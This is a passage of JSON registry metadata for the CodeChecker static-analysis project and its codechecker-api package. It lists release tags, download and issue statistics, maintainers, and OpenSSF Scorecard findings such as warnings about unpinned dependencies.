csson%2Fcodechecker/tags/v5.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1/manifests"},{"name":"v5.7","sha":"1ce7ccbefb1212726331a1fcde4dd37a17cdaccf","kind":"commit","published_at":"2017-01-11T17:17:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7/manifests"},{"name":"v5.6","sha":"e1b0157ad9f61a946fa0343708be7336cf1a6314","kind":"commit","published_at":"2016-11-15T09:20:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6/manifests"},{"name":"v5.5","sha":"c7bafa16fdaf48ed7a890aea002ae0275e32d963","kind":"commit","published_at":"2016-08-30T10:06:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5/manifests"},{"name":"v5.4","sha":"bcc8c663294739c3946e6cd147e0f98fa0e2d57f","kind":"commit","published_at":"2016-08-05T10:43:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4/manifests"},{"name":"v5.3","sha":"902c6cf189d747faae5684c4f3f790224dde5eab","kind":"commit","published_at":"2016-04-14T15:55:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3/manifests"},{"name":"5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2/manifests"},{"name":"v5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2/manifests"},{"name":"v5.1","sha":"ab6c82930bde31e558ca20790df7a701e04ed7e6","kind":"commit","published_at":"2015-11-26T13:16:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1/manifests"},{"name":"v5.0","sha":"5bb577a9c03bbe78317a4a57d20c0c1e3a3064d0","kind":"commit","published_at":"2015-11-11T10:02:45.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0/manifests"},{"name":"v4.0","sha":"72075b4a94b791cee9f434ea5d06c702e2fce16d","kind":"commit","published_at":"2015-08-26T13:33:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v4.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0/manifests"}]},"repo_metadata_updated_at":"2025-08-19T18:14:34.535Z","dependent_packages_count":0,"downloads":622,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":13.4073529552159,"dependent_repos_count":21.619800316896704,"dependent_packages_count":10.082087700208083,"stargazers_count":1.5815535685651674,"forks_count":2.888793017875278,"docker_downloads_count":null,"average":9.915917511752227},"purl":"pkg:pypi/codechecker-api","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/codechecker-api","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pypi/codechecker-api","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/codechecker-api/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-08-10T06:58:09.855Z","issues_count":289,"pull_requests_count":576,"avg_time_to_close_issue":24131448.2,"avg_time_to_close_pull_request":3397393.635220126,"issues_closed_count":110,"pull_requests_closed_count":477,"pull_request_authors_count":72,"issue_authors_count":116,"avg_comments_per_issue":1.6678200692041523,"avg_comments_per_pull_request":0.7586805555555556,"merged_pull_requests_count":412,"bot_issues_count":0,"bot_pull_requests_count":59,"past_year_issues_count":89,"past_year_pull_requests_count":224,"past_year_avg_time_to_close_issue":3579611.04,"past_year_avg_time_to_close_pull_request":1482183.1176470588,"past_year_issues_closed_count":25,"past_year_pull_requests_closed_count":170,"past_year_pull_request_authors_count":37,"past_year_issue_authors_count":52,"past_year_avg_comments_per_issue":1.0337078651685394,"past_year_avg_comments_per_pull_request":0.5491071428571429,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/issues","maintainers":[{"login":"dkrupp","count":73,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"vodorok","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vodorok"},{"login":"Szelethus","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":49,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"},{"login":"cservakt","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"gamesh411","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"noraz31","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"feyruzb","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"stt08","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"csordasmarton","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/csordasmarton"}],"active_maintainers":[{"login":"dkrupp","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"gamesh411","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"noraz31","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"cservakt","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"feyruzb","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"stt08","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"Szelethus","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker-api/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker-api/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker-api/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/codechecker-api/related_packages","maintainers":[{"uuid":"bruntib","login":"bruntib","name":null,"email":null,"url":null,"packages_count":3,"html_url":"https://pypi.org/user/bruntib/","role":null,"created_at":"2023-02-21T09:26:25.656Z","updated_at":"2023-02-21T09:26:25.656Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/bruntib/packages"},{"uuid":"csordasmarton","login":"csordasmarton","name":null,"email":null,"url":null,"packages_count":3,"html_url":"https://pypi.org/user/csordasmarton/","role":null,"created_at":"2023-02-21T09:26:26.461Z","updated_at":"2023-02-21T09:26:26.461Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/csordasmarton/packages"},{"uuid":"gyorb","login":"gyorb","name":null,"email":null,"url":null,"packages_count":2,"html_url":"https://pypi.org/user/gyorb/","role":null,"created_at":"2023-02-21T09:26:26.818Z","updated_at":"2023-02-21T09:26:26.818Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/gyorb/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":726135,"maintainers_count":308800,"namespaces_count":0,"keywords_count":238245,"github":"pypi","metadata":{"funded_packages_count":50579},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2025-09-08T05:32:36.857Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":4126357,"name":"github.com/ericsson/codechecker","ecosystem":"go","description":"","homepage":"https://github.com/ericsson/codechecker","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/ericsson/codechecker","keywords_array":[],"namespace":"github.com/ericsson","versions_count":71,"first_release_published_at":"2017-02-09T17:03:56.000Z","latest_release_published_at":"2025-07-10T17:42:22.000Z","latest_release_number":"v6.26.1+incompatible","last_synced_at":"2025-08-19T18:10:27.788Z","created_at":"2022-04-12T15:18:52.762Z","updated_at":"2025-08-19T18:14:34.536Z","registry_url":"https://pkg.go.dev/github.com/ericsson/codechecker","install_command":"go get github.com/ericsson/codechecker","documentation_url":"https://pkg.go.dev/github.com/ericsson/codechecker#section-documentation","metadata":{},"repo_metadata":{"id":37431651,"uuid":"37459110","full_name":"Ericsson/codechecker","owner":"Ericsson","description":"CodeChecker is an analyzer tooling, defect database and viewer extension for static and dynamic analyzer tools.","archived":false,"fork":false,"pushed_at":"2025-08-19T16:09:45.000Z","size":44800,"stargazers_count":2443,"open_issues_count":456,"forks_count":424,"subscribers_count":52,"default_branch":"master","last_synced_at":"2025-08-19T17:45:59.071Z","etag":null,"topics":["analysis","c","clang","clang-tidy","codechecker","cpp","database","defects","docker","linux","llvm","macosx","objective-c","results-viewer","static-analysis","static-analyzer","static-analyzers","vue"],"latest_commit_sha":null,"homepage":"https://codechecker.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ericsson.png","metadata":{"files":{"readme":"docs/README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":"docs/supported_code_analyzers.md","governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2015-06-15T10:38:51.000Z","updated_at":"2025-08-19T16:09:49.000Z","dependencies_parsed_at":"2023-09-29T11:42:30.441Z","dependency_job_id":"50b5428a-2bdc-4def-b0a6-a46baec9079d","html_url":"https://github.com/Ericsson/codechecker","commit_stats":{"total_commits":3749,"total_committers":127,"mean_commits":"29.519685039370078","dds":0.6054947986129635,"last_synced_commit":"4234fb7b91d07681ee032862fbb096197d5f104a"},"previous_names":[],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/Ericsson/codechecker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/sbom","scorecard":{"id":46490,"data":{"date":"2025-08-11","repo":{"name":"github.com/Ericsson/codechecker","commit":"49a939ab451d1b2a06553f17c4635a306527c33a"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 4 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/codechecker_master_analysis.yml:1","Warn: no topLevel permission defined: .github/workflows/codechecker_pr_analysis.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/config_coverage.yml:24","Info: topLevel permissions set to 'read-all': .github/workflows/docker.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/pypi.yml:9","Info: topLevel permissions set to 'read-all': .github/workflows/snap.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/test.yml:6","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.TXT:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE.TXT:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/docker.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:51: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/docker.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:64: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:68: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/snap.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:91: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:92: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:117: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:154: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:199: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:1: pin your Docker image by updating ubuntu:18.04 to ubuntu:18.04@sha256:152dc042452c496007f07ca9127571cb9c29697f42acbfad72324b2bb2e43c98","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:1: pin your Docker image by updating ubuntu:16.04 to ubuntu:16.04@sha256:1f1a2d56de1d604801a9671f301190704c25d604a416f59e03c04f5c6ffee0d6","Warn: containerImage not pinned by hash: docker/thrift/Dockerfile.thrift.noble:1: pin your Docker image by updating ubuntu:24.04 to ubuntu:24.04@sha256:a08e551cb33850e4740772b38217fc1796a66da2506d312abe51acda354ff061","Warn: containerImage not pinned by hash: web/docker/Dockerfile:5","Warn: containerImage not pinned by hash: web/docker/Dockerfile:43: pin your Docker image by updating python:3.10.16-slim-bullseye to python:3.10.16-slim-bullseye@sha256:c758f6d42a79466e943350a2c5273a09767bddc16a81d381ed21675a382205ee","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: downloadThenRun not pinned by hash: web/docker/Dockerfile:16-23","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:24","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:22","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:103","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:104","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:51","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:64","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:70","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:77","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:125","Warn: pipCommand not pinned by 